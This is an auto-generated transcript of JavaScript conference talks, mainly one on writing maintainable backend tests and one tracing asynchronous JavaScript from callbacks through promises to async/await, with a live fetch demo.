phones like and drawbacks of using it like what are the disadvantages so I mentioned at every step when I pointed out all the benefits I also point out the cost what is the cost associated with this it's not technically drawback it's the cost so you need a GraphQL server with subscription and building a GraphQL server with subscription is not easy it doesn't come for free unless it's a GraphQL engine which is open source and free but anyway so it's a huge effort so you need if you want to do this on your own it's a mammoth level task and if you particularly want to know about the cons the cons are there with any real time asynchronous system you need to be able to handle certain race cases and edge cases which will not appear in any synchronous system right the moment you introduce asynchronous actions or asynchronous pattern in your architecture you need to be able to handle all the scenario that all the other problems it introduce doesn't make sense so with GraphQL per se I can't pick out there are issues with the client libraries any new system has its own issues but it's getting better because the system is working towards making it better any other question sorry I had a question from what I've seen where you use GraphQL typically what happens is that the GraphQL query gets sent to your server over HTTP post which sort of makes any type of CDN or any HTTP based caching completely useless have you figured out some way to kind of is there any patterns so that I can get the best of both worlds where I get kind of the power of GraphQL as well as I'm also not losing out on all forms of HTTP caching so this is one you can say this is one of the cons certain things you will be able to cache in your server there is one way which people have tackled this which is to send the query in a get request in a query parameter which is a hack you will have done it but the community itself is working towards better caching mechanisms but typically you would not need to worry about it unless at scale you need to worry about this but it's a problem that is being actively worked on there is no solution right now that's a great talk Shahid thanks for listening everybody again that a low person that's a good applause if anyone are still interested to know more about GraphQL discuss about GraphQL there is a BOF at 440 outside of it so he will be present so you can ask all the questions you have and we will take a coffee break whatever you like so we will meet back at 430 so let's start the session so our next sorry our next speaker is an entrepreneur two startups at a college and he was also called as Guruji in his office like everyone takes advice from him he loves cats and dogs he has three cats one is Sushi and I don't know two names so he also loves manga and other anime things so he wants to talk about the out of writing test for the backend and stuff so let's listen to him thank you hey everyone thank you so much for coming out today and staying till the very end my name is Deepak Pathanya I work as a product engineer at Postman the API development environment you all know and love and today I'm going to talk about the art of writing mature tests I'm available on Twitter as Deepak Pathanya which was supposed to be a clever wordplay on my name but now that I say it out loud in front of so many people doesn't sound as clever but yeah I'm there on Twitter so yeah you can talk to me about APIs tech or life in general I'm pretty chill like that so let's get started so a little about why I decided to compile this talk in the first place so during my initial months at Postman I was working on this module which was supposed to be really really performant we were constantly trying to figure out different implementations to you know extract that last juice of performance out of this module and we were actually trying out good strategies but there was just one problem tests were holding us back every time we tried out a new strategy I was writing and rewriting a lot of tests and then modifying them all because of a slight change in the codebase because the tests were because the code tests were not able to accommodate that change they were too rigid about the internal implementation I was spending more time fixing tests than writing actual code at one point which I thought was a huge red flag I was going through tons of fixtures to debug failing tests at this point I thought something had to be done but then things got a little worse I realized that I was mocking and stubbing and faking and spying and you get the idea right my tests were actually trying to use everything that is available to write tests out there they were actually just as complex as the code I was writing and I was hoping that the flaky tests don't show up again in the pipelines because some of them I couldn't really reproduce on my local system so I had no idea how to proceed there and at one point I was just staring at assertion failures and stack traces aimlessly so at this point we decided that there has to be a better way so we tried out a lot of different testing strategies and some of them started to make a lot of sense as a benchmark we noted that from going from fixing about a hundred tests for a minor version release we went from fixing less than ten tests for a major version release so we thought this things actually work so we decided to compile all of these small things that you can do without changing a lot of different things in your existing suit so since my title is so click-beaty I would like to explain what not to expect in this talk so this talk is not going to be about a comparison between different testing libraries and frameworks and approaches out there I would assume that what you have you're happy with it if you're not then there are tons of great libraries and resources and articles online would be able to outline these differences much better than I can in a 30 minute talk this would also be not me preaching about writing testable javascript from the beginning I would not tell you that your tests are bad because your code is bad because I can't preach about something that I don't do myself either so yeah what do you expect out of this talk then well you can expect some small actions to improve your current tests without making a whole lot of drastic changes in your current frameworks so let's get started so these are some common mistakes and how can you avoid them the way I've structured this talk is basically it's a 12 point talk sorry that talks about before and after of some different common testing scenarios that you might come across I think to note here is that all the before versions that I outline here are not bad actually they work and they work very well it's just that as you scale some of them might not scale with you also I've tried to be as a framework generic as I can but for the purposes of this demonstration I'm using chai and expect I think to note here is that you can actually do these suggestions in any of the testing frameworks just for the demonstrations I'm using chai because I love the beverage so yeah let's get started so before the first point there is this 0th point which is the test monolith this is the term monolith has been thrown around a lot today so yeah I just wanted to ride on to the wagon so the test monolith is basically this code that has high coupling and no isolation all of the tests are coupled in such a way that you can't really isolate them to run them independently these are actually neither unit nor integration what I mean by that is they make DB calls they call third party services they assert on multiple values and they don't really fall into any of the categories because they give you the worst of both worlds you don't get the isolation and speed of a unit test and you don't get the coverage and confidence of an into an integration test either so why I mentioned this as the 0th point is that because this is something that we're trying to avoid throughout all of the 12 points would kind of build up to this so that if you followed you would be able to avoid the test monolith hopefully okay let's get started so the first thing is asserting a deep equality so we'll basically walk through this code and see what's wrong with it so this is a normal test that tests for user details verification it says that the returned user from a DB call should include all the required keys which is a valid thing to test so we have a user ID we will not get into the details of how this user was created we're simply calling the DB service to get this user once you get the user we're asserting it that it should call with this right ID1 and name debug now this might seem like a perfectly valid test and it is but there's a small problem with it this so whenever you're dealing with deep equalities and strict checks there's a very very high chance that you will be fixing your test later as people who work in startups we work on things that are under rapid development so you might be adding a lot of different keys you might be removing a lot of different values from the response objects that you send from one function to another and if you're very strict about the object that you're checking in your test code it is bound to break so tomorrow you say okay I want to add a username field as well to my users all of your tests that checks for the user response strictly like this would start breaking because this actually says that your response should exactly be like this right so a little slightly better way to go about it would be to do something like this we have the exact same test here when we call the when we get the user by calling dbservice.getUserByID rather than asserting on the exact structure of the object we just say that it should include all these keys now I promise that I would not get into the details of one framework but this is something that is present in most BDD test assertion syntax I've just given the example of chai so you can find something like includes contain and something like that in your testing framework choice as well so just a simple fix of you know not asserting on the exact deep object but just checking that it includes all the required keys you want can actually make a huge difference when you start rapidly working on your projects moving on skipping tests so skipping tests is something that we all have done in the past or it is something that is actually required in some cases so for example in this case I have a listen ordering test and it is that it should allow moving a listen to the beginning I'm assuming that's just a listen linked list or something and I'm testing that moving to the beginning should be allowed it's a perfectly valid test but for now we have skipped it so what's wrong with it there might be something that is actually not ready for this test to be done right but the problem is we haven't specified what that thing is and we haven't specified when this test is ready to be unskipped I've actually seen open source code bases in which there was a skip test from two years ago and none of the future developers had the heart to touch that because they didn't know what that does right so a small but nifty solution to this is specifying something like this we are saying that moving a listen to beginning is currently not supported because of some limitation and we are specifying a to-do that says that unskip this once head pointer is introduced so the next guy who comes along and reads this if he sees that ok head pointer is now ready he can unskip it and get on with it this is just a small change that I've seen gets accumulated over time like I've seen 15-20 skip tests that nobody had the heart to touch because nobody knows what they were supposed to do so yeah just a small thing that gets a long way when you're working with teams next slide too many fixtures so fixtures are basically just dummy data that you use to send in your tests and assert on the responses right we've all seen that large json object that we have a fixture object of here I'm seeing that we have too many fixtures like for example in this one I have a user that has the role as admin and I've second user that has the role of user and similarly I have so many other users with some different properties that I'm using in different tests but the first one I might be using it in a test for checking admin privileges the second one I might be using for checking non admin privileges or something like that the problem with this is once something actually breaks the next guy has to go three levels deep to debug what that was right so imagine the scenario you had a test that called the fixture data dot u1 and it suddenly starts to break now the guy goes to this fixture file he looks at u1 it then looks what all properties it has it then looks at the test and sees what key what what method would might be breaking that actual test and then he goes on to debug that right and if you have like two thousand of these objects for different scenarios you have like some technical depth you need to get off so a better way to do this would be to construct an object with the minimum required properties so here as I mentioned I'm checking admin privileges I'm checking that the admin should have access to remove members something right and I decided to construct an object with the minimum required properties that gets my job done so the only difference between the first two users apart from all the name and avatar differences but their role right so I can construct a bare minimum object that I pass to that function and check the same things rather than calling in you know fixture fixture value so what this does is since I'm specifying it in the test itself it's very easy for the next guy to debug it and we use u1 in the test code and see how I mentioned with the minimum required properties right because some of you might have some policies in place that allows the checks that a user should have these properties should have these keys and stuff like that right so the minimum required properties with which you can construct objects to be used in test is a nice thing to have moving on so conditional logic so this one is actually a little bigger let's see through it and then see what's actually going wrong here so this test is basically checking that on violating thresholds we should add the user to the mailing list right so like if I use a violate some sort of thresholds we add them to a mailing list to say that hey update your plan or something right so what we're doing here is we have a current user current usage of that particular user that we get through a random number and based on the number that we get the user's current usage might be above the threshold or it might be below right if it's below the threshold we assert that the mailing list does not have this user and if it's above or equal to the threshold we assert that the mailing list has this user this is actually a valid test wherein you're just checking that if the if the user actually violates the threshold is added to the mailing list but then again there's something wrong with it so the wrong thing as we have already mentioned in the point is conditional logic your test should ideally always test one execution path if you have a test that is checking multiple execution path you should ideally break down into two tests that enforces that to take one of the parts so like let's look at the better way of doing this so here we have some value above threshold specified as thousand we are using that value in the current usage and in the test we are simply asserting that the mailing list has this user in the next test I can have a value that is below threshold that checks the alternate execution parts so this is a simple thing but what is what it's doing is it's making sure that your test always goes through one given execution path there is no uncertainty involved next so following poor spec naming conventions so we all know that naming variables is a hard problem to solve in tech right but the same is true with naming your test specs as well so what I've seen most people do is that they use the name of the function in the describe block that they're writing so if I'm writing a function that adds a user my describe block would say add user and but as a thumb for writing better descriptions the describe it block should always form a proper sentence because even though you specified say the name of your controller or anything in the describe block the next guy who comes along might not have the context right so if reading the describe it block makes perfect sense to him it makes his job so much easier and a single test description should include the unit of work the scenario in the expected outcome let's see some of the scenarios wherein this is being followed and violated to get a better idea of it so let's see this so here as I mentioned we're using the function name as the describe block description in the eight block I'm specifying that it's a test for number seven two double three right now the seven two double three could be a GitHub issue could be a Jira ID could be you know God knows anything right so if this test decides to fail tomorrow the guy comes along the next day I was looking at your code comes along it tries to figure out what seven two double three means it then looks at that particular issue sees what went wrong there then looks at the test then sees what actually changed from there to now which might have caused this test to fail and then fixes it by this time you've lost one thousand users right so a better way to go about it would be to use the spec convention that we have stated right now so yeah something like this doesn't really make a lot of sense because what if you were using something like Jira earlier and right and then you decide to transition to something like aha or something you have a different issue tracker now how do you decide what this ID actually belongs to moving on so we have this particular test here which again uses the function name as a describe block text and it says that it should return 200 for proper input it should return 400 for wrong input this I've actually taken from a very famous open source library right and it just says that it should return 200 for proper input and 400 for wrong input both of these tests pass right in the first test somebody had used a value of say 5 or something in the next one somebody had used a value of I don't know 8 or something right as the next guy who comes along it's up to my curiosity what I make out of those number is it that this particular function works only for odd numbers is it work for you know multiples of 5 or something I don't know right since I've not specified what the proper input here is or what the wrong input here is I don't really know what the context is so it actually leaves a lot of things to the imagination of the next guy and this is very famous quote that says that always write your code in a way that the guy who ends up maintaining it is a serial serial killer and knows where you live so if you follow that principle this is not what your test fix should look like so a better way right so this is a scenario in which I'm specifying that dispatching an active bucket should empty the active bucket and add it to the process list right now this is actually following all of the principles that we've talked about so far because we are specifying what the unit of work is what the scenario is and what the expected outcome is so the next guy comes along and sees that it's failing immediately knows that something's wrong with the dispatching logic of the active bucket and he can go ahead and fix that he's a happy person so are you next so deeper implementation levels so let's look at this again and see what might be wrong with it so we have a function we are testing for a function that adds a user to the database is saying that adding a user should add them to the database so much for good naming we are specifying a user with the bare minimum requirements that we talked about earlier and in the async waterfall we are adding the user first in the next one we are calling an internal queue in which the user is added first and then flushed to the database and we are saying that the internal queue should include that particular user and this looks like a perfectly valid test right we have a scenario wherein we add a user it gets added to an internal queue then gets flushed to the database and the user is added to the DB so much for writing good tests but there's something wrong with it well we are at a deeper implementation level then at what we wanted to be how does that mean and how does it make sense well it would in a minute so yeah here's a better way right we do the same thing we add the user to the DB but now we stay at the same level by doing a DB verification now rather than checking whether the user was added to the internal queue properly or not we actually get all the users and see that the user is part the user we just added is part of all of the users from the DB what does this do and why does it make a difference right so consider the scenario wherein your internal queue flushing logic went down right so any user that you add is actually not being added to the database but all of your tests still pass because in your test you simply asserted that the user should be added to the internal queue properly this is a very simple naive example but the thing that is trying to highlight is you should always stay at the same level of implementation if you're trying to say that an action went through and rather than just checking that the endpoint returns 200 verify that that action reflected in the DB that way you're not screwed if there's something wrong or if there's a discrepancy between your database and how you're returning your JSON right is it making sense okay nice okay so yeah we expect that the users include this particular user uncertainties so yeah we have this particular thing wherein we are testing for string handling we are saying that it should ensure that large strings are handled properly it's one of those functions which formats large number of likes into like say 10 10 m 10 million likes to 10 m or something like that it's just formatting likes and the way this function behaves is if it gets a string that it cannot handle it throws an error right that's the assumption so here's how we're testing it we are basically creating a very large string using this iterations variable that we call in the loop and we get this very large string x which is just the repetition of the string 1 2 3 4 5 then we call it in format likes and we can and we see that if it actually throws an error or not right if it does we return the done call back with an error otherwise we do right so this basically just says that if your format likes function through an error your test fails some of you might be wondering why we don't have any assertions here that is because of how we have handled the error in the catch block we're simply throwing the done call returning the done callback with the error which makes the test to fail if it actually throws right now there's something wrong with it because if this test fails there is an uncertainty in my mind did my format likes function go wrong or did my string generation function go wrong right it might be so that this method that I used to generate large strings has gone wacky and is not generating things properly anymore did that go wrong or did my actual function go wrong well you have to check and know right and that is what you don't want to do when things are breaking so a better way to do this would be to just you know specify a static string so that you trust your tests you know that I specified a static value in my test and if that is breaking and the error and the test is failing and something is wrong with my format likes function for sure the last thing you want when your things are failing in production is to be uncertain whether my tests are wrong or did I do something that might have caused this right you want to be certain about which thing you want to target when things are breaking and this allows you to do that so we just specify a hard coded string and use that in our function separating declarations from usage so this is something that is not really related to how tests work it's something that you might come across when you're debugging failing tests and it is something that used to get on my nerves so I decided to add this here so what I'll see is I have two variables at the top bonus points or anyone who knows what these variables mean can come and talk to me and in this describe block we have tests that have vars declared up top the first block do not use Luffy or Zorro the second block uses Zorro not Luffy and the third block uses both Luffy and Zorro but we've still declared all the variables at the top so that they're available in the describe blocks the next guy who comes along to your organization might see this as a practice any variable that you want to declare for usage in your test you declare it at up top this actually leads to a snowball effect I've seen test files which when I open I have 150 lines of variable declarations and then my describe it block starts so the last thing you want when debugging a failing test is to scroll all the way up see which variable is failing and then try to debug it I've tried that split view and all of those things but when things are failing you just need your piece of mind so a good way to do this is to use the scope that describe blocks provide you so has like a yeah so the good way to do this is to just specify all the variables close closest to their usage right so you if since the describe block provides their scope of a scope of their own if there's a variable that is supposed to be used in this particular describe block specify it at the top of that block it actually makes a lot more sense to you know scope them closest to the describe block they're being used in rather than at the top moving on dependence so let's look at what this test is doing and then we'll see what's wrong with it so we have a describe block that tests for all scenarios of updating a user status in the first test we are saying that it should allow updating role of the user so we create a user here we pass that user ID to the next block and then we verify in the db that the update went through like a good tester right good thing but has something that we did wrong we actually in the second one we update the user and verify it in db right we use the same user that was created in the first test block in the subsequent one hoping that since they're in the same describe block they would always be executed again so that way when my first test run I have that created user I update its preference I can use the same created user in the subsequent test well this actually leads to dependence in tests ideally all of your tests should be able to run in isolation when you're fixing only one test something like an only clause should work with each and every test and setup and teardowns are there for your rescue so here's that same test again in a better way so in the updating user status we have this before method that actually runs before before the test in this particular describe block so the order is the describe blocks runs first and then the subsequent ones so if you see I'm using it dot only here and it actually works because before this test ran we actually had that user creation in the before block so even if I run this in isolation my before block would still run and I would have access I would have access to that user which I'm trying to update unlike the first case wherein the user was created in the first block and then reused in the subsequent one this actually brings us to the next point which is extra setup so we just saw how setups and teardown can help us remove dependence but they can also hold up and act and kind of choke your pipelines if not used in the right way so let's look at this particular test we are testing user updation flows in the first one we admin privileges we create admin add a non admin user and in the after block we delete the created user notice how we're using before each here instead of before so this actually runs before every user so that even if we create and delete them we still have access to them in the next test block in the first one we simply create the admin and non admin user and it uses the created admin user and the second one it uses the created non admin user right the seems like a perfectly valid test the thing wrong with this is we're actually creating the admin and non admin user before each of the test runs right so in this particular case the flow would look like what the flow would look like is we create two users one of them is used in the first test then we delete both of the users then we create two users again one of them is used in the second test and then we delete both of them again right these are just two tests imagine 5000 right so if you have a lot of code in your setups and teardowns which is not exactly being used by every test in that particular describe block and you're running a lot of things for each of your tests right and as you scale your pipelines would run for 30 40 minutes so your developers would simply push something go out eat something come back see that the pipeline has failed rerun the pipeline and do that for the rest of the day which is not something that you want right so here's something that you can do in a better way so here what we have tried to do is we have tried to scope out the different uh checks that we wanted to do into two separate describe blocks now since describe blocks follow scoping each of the describe blocks would have only their particular lifecycle methods run so the first one would have set up for admin users and all of the admin related tests would go to that describe block similarly the non admin users would go to the second block in this way the first test would verify whether the admin can update team billing cycle would have only the admin user being created before it is before it runs right so this actually accumulates this actually allows you to scope out different tests in such a way that only those tests who need common prerequisites are grouped together in a describe block moving on so asserting on values without explanations let's look at this uh so we have something called spy here so spy is basically just a construct that allows you to look at a function and see everything that's happening to it how many times it has been called what arguments were passed to it each time and things like that you can read more about spies I'm using synon here right so I have a spy on db update and a spy on db destroy and I'm creating an admin user and I'm deleting the user here and in the assertions I'm saying that the spy on db destroy should have a call count of one and the spy on db update should have a call count of two right this test works everyone is happy but then one fine day this decides to break the assertion message that you get would simply be the spy on db update has a call count of one rather than two at this point the next guy who sees it since he has no context of what all goes in the db update method uh in the what all happens when you do the uh admin deletion he has no idea what might be going wrong right in the worst case scenario he might actually change that call count from two to one make the test pass and then push that again hoping that was actually wrong earlier and now you have fixed it right so something like this can easily confuse people because you're just asserting on random values without explaining there and if something like this starts to fail you simply have a message like expected four to equal three right which is very confusing for the next guy so a small thing here would actually go a long way we do the same thing we create the admin user we delete the user but then we specify what each of those calls actually meant in the first case we specified the db destroyer would be called once for the user who's actually being deleted and in the second one we specify the db update would be called twice one for the team members being updated and since this was the admin user the ownership had to be transferred to someone new so one db update call goes through for that right now if this fails then the the guy knows that okay either the team member updation logic is going wrong or the ownership transfer thing is going wrong I have to go and check one of those things right so he's a clear way of debugging what he has to rather than just speculating what could have been okay last point too many assertions so let's see what this huge test is doing we're saying that we should verify that a user with role admin can delete the team we are creating a user asserting on the return response like a good tester we are verifying in db that this action went through we are then updating the user to grant delete access and then we are verifying in db again that the access was granted we are then deleting the team this user belongs to and then as a good tester we are verifying in db that the team was deleted right this looks like a great test but there's something wrong with it so at every step we have a lot of assertions right we are creating a user then we are verifying it went through we are updating the user's permission we are updating that we are checking that it went through and then finally we are actually doing what we wanted to right a good way to go about it would be to use something like stubs right so what a stub is a stub is basically a function with a pre-programmed behavior so you can specify that this function should always do this if a stub is wrapped around the function then the original function is not called the function that you specify in its place would actually be called so here I'm having separate tests for user creation and updation which is very important I'm saying that I'm pretty sure that the user is properly created and the user is properly updated because I have specific separate tests for them and they work and I'm confident about my tests in this particular test I would simply stub that the user is created and has the required access right so I'm saying that whenever db service.getUser is called rather than calling the actual function just return this user that has all of the granted access and then I'm getting the user deleting it and then as a good guy I'm verifying that it was deleted in the team right so this basically says that you should have some sort of abstraction in your tests so that if you actually are doing multiple things you can abstract out some of those things and stub to reach that particular point which brings me to the next thing which is abstraction in tests so consider the scenario wherein we have an initial state some setup a branching state and then we transition we go to different parts path a b and c right ideally there should be separate tests that assert that one user can reach the initial state properly there should be a test that stubs that the user reaches initial state and then should check that it reaches the setup state properly another test that stubs whether he reaches the setup and can reach the branching state properly and another test which reaches the branching state and then test for each individual parts so the point that I'm trying to make is if you're testing a thing once make sure you tested only once if you have a test that tests for user creation then every subsequent test that requires a user to be created should not be doing that again and again so if you have to reach a particular branching state to reach multiple parts use stubs to ensure that you have already reached there and then actually test only the thing that is required in that particular path which brings me to test design so test design is nothing fancy I'm not going to talk about TTD because it's not it does not really make a lot of sense for some of the startups wherein you are rapidly changing things you write tests for something you make them fail you make them pass you write the code tomorrow some other requirement comes the exact the entire code base goes away right so TTD does not make a lot of sense in some of the cases so something as simple as test design where you're laying down constraints to define boundary where you are identifying the different actors scenarios and all the permutations from the beginning and writing them down as described blocks and then writing the test and just filling those described blocks later makes a lot of sense this allows you to think first and test later so that you have already prepared a spec of what your test should look like and when your code is ready you simply fill in those specs and what all does this give to you right you've done all of these 12 points you've mastered the art of writing mature tests what all does this give to you well onboarding new people isn't a nightmare consider a scenario you have a huge project right and I decide to join tomorrow I see this massive code base I come to your desk and I'm like please explain to me what all of these files do right you don't have the time or patience to do that but if you have good test suits with proper naming conventions where in describe it blocks make proper sense you can just try redirect me to that and say experience what I've seen is you don't really need mocks at all in majority of cases this is just my personal experience right what I've seen is a stub that has a pre-programmed behavior can actually suffice in most cases you use mocks only when you're actually trying to assert on the response that that gives right so for example if you're making a third party call to get some data and you need that to backfill your test in that case a mock makes sense right because you're trying to say that rather than actually making that third party call this is what that call would end up returning but if you're using something internally the example in the examples I showed you're using something like a get user or DB service or calling an internal method that was supposed to do some computation their stubs make a lot more sense because you know you can just specify that this is the function that should override this implementation and since I talk mostly about unit test they should not ideally include third party calls at all so in those scenarios mocks don't make sense but yeah if you have any third party calls which you would like to assert on the result of then mocks make sense there so that's the main difference that I find that for any internal thing that you're calling stubs suffice but any third party calls go with the mock So in your 11th explanation where you're explaining why the test code written equal to one equal to two was not a proper one the solution was that they can write some comment over that so that the end user can understand should I be there otherwise if I have to rely on the comment I can write the same comment in the code itself instead of writing on the test block or somewhere else describe and it would be explanatory so that's a great question actually so my counter argument to whenever someone asks that is I use tests to onboard people like I mentioned onboarding isn't a nightmare if you have good test specs so if I'm redirecting someone to look at the tests I would want them to minimally look at the actual code so if I in my test description itself I have I ideally tell them that close all the describe it blocks and just read the sentences that they make right say oh dispatching the active bucket should do this should do this in this scenario should do this in this scenario and stuff like that right so I ideally tell them not to open the it blocks at all but in worst case in scenario you would like to see what's happening expand the it block and there if they find a comment like this they don't have to go to the code right so just for out of my personal experience I've seen that specifying these things in the test allows you to onboard people better because if that guy goes into that code file to read that comment now isn't he's in a new rabbit hole right he starts to try to decipher what that code is doing how things are being working how things are integrating together and he actually gets confused a little so in my experience I've seen that specifying things at the test level itself makes more sense in these cases hey I'm here at the back so can you hear me yeah I can okay so great talk I like the idea of designing test cases before actually writing them thank you I have a question on the documentation so let's say I have written test cases for like five to ten files and somebody is joining my team now so I would want that team member to go through documentation first rather than going into the test cases and looking at the assertion so let's say comparing to a code there are if you add jesphoo not jesphoo jes I think I forgot so there are if you like comment blocks on top of your methods jesdoc yeah that's all you can use any npm package to generate documentation easily is there anyone for test cases as well yeah so jesdocs actually make a lot of sense we do use them heavily for some of the things but what I've seen is that when you are working in a fast paced environment for a module that might not be even available tomorrow because expectations change in startups right in those cases you don't really have the time and patience to write those beautiful jesdocs in comments right so something as simple as a normal comment where you're specifying what I'm trying to do here or the describe it blocks making proper sentences would suffice there right if I'm writing a module that is being open sourced or that is going to be well maintained throughout I would definitely recommend going with jesdocs because you can have a simple npm command to generate the documentation when you do any more changes right that can be a part of your publishing pipeline whenever you publish update the documentation by picking from the latest comments so that makes a lot more sense for modules that you know are going to stick around but when you're just hacking something quickly for something that is rapidly iterating things like these make more sense okay so my question is around do we have any tool to generate documentation of test cases similar to jesdocs probably I haven't come through one if you if you do then please tweet about us please tweet about it I'd be happy to look at it thank you okay thank you deepak patan here I mean deepak patan here that guy had a question do we answer that we'll cover up okay cool thank you so I think I'll force my back end developers to write test when I go to office one day I don't know what about you guys so our next speaker is hey month he's an ambidextrous guy and he also got a Guinness record so he says that he had a virus in his brain and he's acting weird since then I don't know why he's acting weird you need to find out now so he's also a polyglot google developer expert as well as he spends most of the time in free and open source software movement like helping dug dug go and other open source software so let's welcome hey month can hear me guys Namaskara GS Fu thank you for being here for such a long time I'm going to end the day with a story story of ved my son who wanted to learn some serious JavaScript then I suggested him not to read so light versions of JavaScript but to read something serious JavaScript for babies he did read that and his first assignment was to read a file as simple as that he said well that's easy I'll just do a read file sync give me the file name I'll read it okay but it blocks he said okay he learned some more and he came to the call back version instead of the read file sync he started using read file and then gave a call back to it with the file name after the file is read there's a call back if there's an error you would call back with the error and result this is the normal drama we all of us have done so far okay that's not bad now you want to process a file the same file you have read now you have to do some process on it how to do it said okay that's easy again I think he started with a simple function call process and for which a data and the call back is passed and the remaining pattern of reading a file and checking for and handling the call backs and then returning the call backs and again a call back in the process continued you rang I heard you like call backs so you can put your call backs in your call backs and call you back when your call backs are done right this has been the common slide most of us use from Mozilla where it explains about the pyramid of hell this is an example where you want to cook some rice you pour some water bring it to boiling temperature lower the heat add some rice set time out and how many call backs we already have to eat our rice promises when you know then you know right promises are some objects that can that resolve that gives you some result and it's kind of promising you that I'll give you some result on a period of time right it can go through different states it can be fulfilled or rejected if it's fulfilled then you'll change it with then if it's rejected it will go to the catch the fun part is with then also you can handle both rejection and fulfillment and finally it is settled and you have some operations and the idea of promises is you return a promise and then you change it so again it's like you could change your promises with then some catches right after you catch also you can do it then it's a simple example where you do a new promise and you pass in a function with resolve and reject to it if everything goes well you resolve it if there's some problem you reject it with what the problem was then you can do a promise dot then and the first callback that comes in would be be successful if it's resolved or else it will be rejected here's the simple node module I've written called lie-fs but today if you're on the latest versions of node you can use the promise if I version of fs fs slash promise which comes as a neutral within node but with live dot fs what basically it does is it promise if I is all your fs methods so in this example if you want to know the stats of your temp directory you can just do fs dot slash fs dot stats on temp and you get a promise you can also log it or error it out if there is an error but there's a problem again with promises if you're not careful you end up with something like this well there are mitigations similar to how you can escape callback else you would name your functions name functions keep your promises separate all those things are there but it's not it's not guaranteed that everyone would practice that you would have seen many of the code bases having this kind of a thing here's one more real word example where you connect to the database and get the user information and get the user settings and then finally enable access so it almost looks like the callback hell but with more of a chaining of then how many of you know this guy awesome yeah so that's tj tj wrote a blog post a few years back he said streams are broken callbacks are not great to work with errors are vague tooling is not so great in the community it's not so great and community conventions it's kind of sort of up there I for a very long time I thought tj was a company the amount of code he was churning but luckily I happened to maintain one of his repose it extras then I believe that ok tj as a person exists but I was seeing this pattern even though he quit note he was he was pretty active on this project called kovages which I'll be talking about and why tj also felt and I think he saw the future welcome to Jurassic Park I think await I think is a keyword when used next to a function it indicates that whatever you return in a function would be a promise it could be as as simple as return one so if you have a sync function and you say return one it would return a promise that would resolve to one and I think functions of the function are only those functions where you can use this await operator right and what is await operator await is an operator that suspense the execution in the scope so what I mean by that is suppose you have an async function and you are waiting for a promise to resolve it kind of suspense is the execution the order of which it's executed assume like pausing the flow only within that async block right and then it will wait until the promises either resolve or rejected if the promises rejected it will throw so in 2016 I said years 17 or years 2017 will be look the code where we write would look like sync but run like a sync and in 2015 at 3 in the morning I said I said like script await is no fun till it gets an easier way to capture rejected promises in 2014 I kind of did a talk on async await when it was in a proposal state and people said like dude it doesn't make sense but today this is how we can define an async function the emoji is just for the fun of it if you want to define such kind of function you have a plane object and put the emoji in the string then you can still define and you can see async function and see await it's normal like the normal function and you can use an arrow function or you can use a generator here's an example from the codebase I think I can point to this alright that's fine this example is from the spec what it is basically doing is it takes an element and set of animations applies the animation on that element and finally returns the final value after applying the animation on the left is the promise way of doing it we basically have a promise resolve you could also read you can rewrite this with produce but you basically have a promise dot resolve as your initial promise and then for each of the animations you you do it then apply the animation save the result and finally return it if there is an error you will catch it of course if you were to rewrite the same thing with async await it would look like this right you have an async function you have a try catch block and for each of the animations you just await for the animation to complete and you have the return value in this it looks so intuitive right you can just if you can just take it as an example read what's happening on the left and read what's happening on the right or for you it is the left and right and then then it's so intuitive to read it looks as if you're writing an asynchronous programming but because there is await it is asynchronous in nature all right demo time so I had written this you know kind of a xkcd comic fetcher how many of you follow xkcd okay awesome so what it it does is basically get fetches me a random xkcd cartoon you're not able to see that all right this screen is not coming up there probably because I'm on fullscreen or it's tough to see the big screen and type enable the mirroring but this is not working this is a second sorry for that all right so basically this endpoint gives me a random xkcd cartoon it gives me the URL and then gives me the title right now let us go through a journey of fetching this URL from the console and see how the journey goes through we start with XHR it's big now we do a new XML HTTP request the name is XML HTTP request no more we are doing XML calls or it's an HTTP it's more like Gulab Jamun neither it's Gulab nor Jamun right but but we over lives as JS developers for this like this is like gift from Microsoft where the people enable the XML HTTP request we do XHR. open which takes a method in this case it is get and that's not the URL this is the URL to which we are talking and then I'm not sure how many of you are aware or have used this last parameter the last parameter makes this a synchronous call a synchronous network call right that's where Chrome spits directly on your face saying that hey don't do this and if you were tried if you try to set the response type on this you can't do that because it is synchronous right now we kind of say on load end we will console log image yes console log image XHR dot response dot data dot what what is the thing we were getting response dot URL right and then we send right we got the response it said title and URL console log image what we got was this yeah this is how it should have rendered right now it's totally from the server nothing is mocked it's not my fault we do a new XML HTTP request again and this time let's kind of make it synchronous quickly right we again open up with get but we will not pass this false here and then on load ended we will take this and let's quickly log what are we getting on as response right response dot data dot URL and then we send so it's not data dot URLs for sure right so we open again all right that's the good way to do it and we have done an open we'll do a send so it's URL it should it should have just been XHR response dot URL right it's a string okay very attentive audience at 5 p.m. all right we open again and we send all right that was perfect so we got the point right we'll we'll go to the next one and we'll pass it out there so that so we started with XHR we did a synchronous call then we did a synchronous call we saw the network request call happening now is the time for jQuery right with jQuery what do we do we do a get json right and then our URL I better define this as in API somewhere right I will call this API and pass this here and we do dollar dot get json okay and then we pass the API and then we pass the we get the call back right which has the data in this case will the data be passed or not is it passed now we do image and data dot URL okay so we have the image in the console all right now this was jQuery so we did the synchronous asynchronous jQuery and finally what's up next yes we would do FH API and it returns a promise so we would do it then and say we have a D and this kind of gives you json and then you do it then again call this response and console dot image response dot what would it be here URL right and then if we would probably need a catch if there is an error right let's see okay there we go that's neat so how do we take this further now let's try I think a bit of this right now we will remove this we will say await fetch one gotcha here you can't you can't really use await in the top level there is a proposal for top level await what do I mean by top level is basically you need to wrap this line in an async function as mentioned earlier because this def def console if you use a top level await it kind of gets wrapped with an async function so you can do do an await on the def console without wrapping it in an async function right we do an await we get a response right this would have a json on it isn't it we will do an await of that we get the data we console image this right dot url making the request so we wrap this entire thing this is fine right yeah no as in where the url is coming that's fine so we wrap this entire thing we get this okay there we go it's a really bad way to do it as we noticed having await await await in a line again this is just for the demo purpose to show what we are awaiting for and thanks for being an enthusiastic audience and highlighting all the scripted mistakes right awesome so we we saw we kind of read we kind of saw the journey of starting with the synchronous to asynchronous to jQuery kind of a thing to an await today we kind of saw how we do this it's kind of clear okay so here's a quick quiz question on what would left print or log and what would write log by intuition the left looks like it would log abc right right right yes no yes but no it will not it will end up logging see be a but why what's the difference between these two the key difference is we are awaiting there's a written await the other one would print abc right so it's a key point to remember that when when whenever you're awaiting if you're if you're returning something out of await which is kind of an obsolete this just to show that how await kind of makes a difference if you're returning something in the try which has which has a promise and your functions are saying make sure that you're awaiting for it that's when it waits for that promise to get resolved in this case it doesn't really right so that's where you know how the how the pause 